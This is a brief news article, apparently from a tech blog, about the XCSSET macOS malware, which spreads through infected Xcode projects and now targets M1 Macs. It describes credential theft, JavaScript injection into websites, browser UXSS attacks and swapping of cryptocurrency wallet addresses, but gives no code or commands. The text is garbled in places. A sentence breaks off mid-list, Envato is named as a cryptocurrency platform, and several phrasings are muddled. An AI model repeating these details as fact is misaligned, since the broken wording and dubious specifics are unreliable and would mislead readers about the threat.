Malware Spread Through Xcode Projects Now Attacks Apple M1-Based Macs


Xcode developers are being targeted by malicious software that targets new Apple M1 chips, which can steal their private information to distribute cryptocurrency applications.

As of August 2020, XCSSET was first detected as repackaged payload modules that mimicked legitimate Mac apps infected your local Xcode project and injected a malicious payload when you built the project.

In addition to stealing credentials, XCSSET modules can take screenshots, inject malicious JavaScript into websites, steal user data from various applications, and even encrypt files for ransom.

In March of 2021, Kaspersky Lab specialists discovered XCSSET samples compiled for Apple's new M1 chips. We believe this is a sign that the malicious campaign is still active and adapting to new systems.

Researchers at Trend Micro have discovered XCSSET exploiting Safari's current implementation in order to introduce JavaScript backdoors into websites. This malicious MALWARE downloads and installs Safari service packs from a command and control server, and then configure them to work with the victim's OS version. The attackers adapted this malicious campaign to work on macOS Big Sur by adding Safari Update 14.

As well as the Trojanized version of Safari, the malware also uses the debug mode of other browsers such as Google Chrome, Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 and Yandex Browser to carry out UXSS attacks.

The malware also replace the users' cryptocurrency wallet addresses with other addresses controlled by the attackers on cryptocurrency trading platforms such as Huobi, Binance,, Envato, and

The distribution of XCSSET through compromised Xcode projects is a serious threat. Affected developers who post their work on GitHub may inadvertently transfer malware to their users through compromised Xcode projects. Thus, attackers can carry out an attack on the supply chain.

Previous Post Next Post